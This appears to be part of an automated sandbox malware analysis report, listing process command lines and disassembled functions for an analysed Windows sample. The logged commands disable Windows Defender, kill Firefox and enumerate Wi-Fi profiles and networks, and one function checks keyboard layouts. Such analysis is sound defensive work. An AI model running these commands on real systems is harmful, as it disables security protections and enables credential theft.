Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" stop windefend
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	05:11:40
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	05:11:42
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xec0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	05:11:42
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	05:11:43
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	05:11:43
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	05:11:43
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x320000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	05:11:43
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	05:11:44
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xe30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	05:11:44
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	05:11:44
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	767
Total number of Limit Nodes:	13

Executed Functions

Function 003B652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,003B652A,?,?,?,?,?,003B7661), ref: 003B6567

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 61902f06fe1a5f1c839a071a605010b7eee176bd362cce1cb7b5bd5c4e679f45
Instruction ID: e7d2b2db2f9d5ad60473d50833daac801050687a1c9df54c716e12b6bda8c6a4
Opcode Fuzzy Hash: 61902f06fe1a5f1c839a071a605010b7eee176bd362cce1cb7b5bd5c4e679f45
Instruction Fuzzy Hash: 17E0863000250CAECF377B24C85AE893B59EB1274DF011806FA084A527CB29ED51D541

Function 04BC01B4 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097925303.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6ea8837b2178679a8953fdccf09d9af1b18b872931f94eb663bffc2b3bf66c
Instruction ID: a8df020e8e163e3167ba5726f5423bd7913427d985165ac57cbabfd529f4e422
Opcode Fuzzy Hash: 3e6ea8837b2178679a8953fdccf09d9af1b18b872931f94eb663bffc2b3bf66c
Instruction Fuzzy Hash: 2B31ECFB24C1607DB202A1926F58EFBAB7DE4D2730335C47BF402D6446E2951E5E6132

Function 00385C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 003860FA
00000419, xrefs: 00386098
Keyboard Layout\Preload, xrefs: 00386054
0000043f, xrefs: 0038612B
00000422, xrefs: 003860C9

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: ff6c1eb09b86d9a1b61eec5630473dda8a88e508648ce800b06b44102a07c769
Instruction ID: a2b6a691ec4f912db51bdaa507a51bf294e1efc8331d86cd477c0aa79f94738a
Opcode Fuzzy Hash: ff6c1eb09b86d9a1b61eec5630473dda8a88e508648ce800b06b44102a07c769
Instruction Fuzzy Hash: D3F1C270900258ABEF25EF54CC85BDEBBB9EB45304F5042D9F508AB2C1DB74AA84CF95

Function 00389BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: 7523d635ffd87b40908a69b8125dc7663aec46e30f4d5225ac5e406136b9dfe8
Instruction ID: c587eea209b5a768c424e5f863a4f0c8c10ad242c2afe934947c0f9d96c62270
Opcode Fuzzy Hash: 7523d635ffd87b40908a69b8125dc7663aec46e30f4d5225ac5e406136b9dfe8
Instruction Fuzzy Hash: DA318A316143048BFF1ABB78DCC976DB772EBC1314F24869AE5149B3D5C73659808752

Function 00389F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: b742342d6d43d8cb66cc4c28cd07ccf69e6062897b964a110606176c22dd1e22
Instruction ID: 0164a0018ecc97cae4152b18faa92de0dca5a45b176428e634cc46e668018c35
Opcode Fuzzy Hash: b742342d6d43d8cb66cc4c28cd07ccf69e6062897b964a110606176c22dd1e22
Instruction Fuzzy Hash: 803186316143049BFF1ABB78DC897ACB762EFC1310F24869AE524EB3D5C73699808752

Function 0038A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: 6aa536a5428a4e5a4a4af3ef72986dd51a5664190767a1b13c636846da126ec9
Instruction ID: b4fba372ec5ca39325cbb15db4cb967c86879e51e81232990e343a2f5840c014
Opcode Fuzzy Hash: 6aa536a5428a4e5a4a4af3ef72986dd51a5664190767a1b13c636846da126ec9
Instruction Fuzzy Hash: 5E314671A146049BFF1ABBB8CCC9B6CF762DBC1314F20869AE4149B7D5C73699808752

Function 0038A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
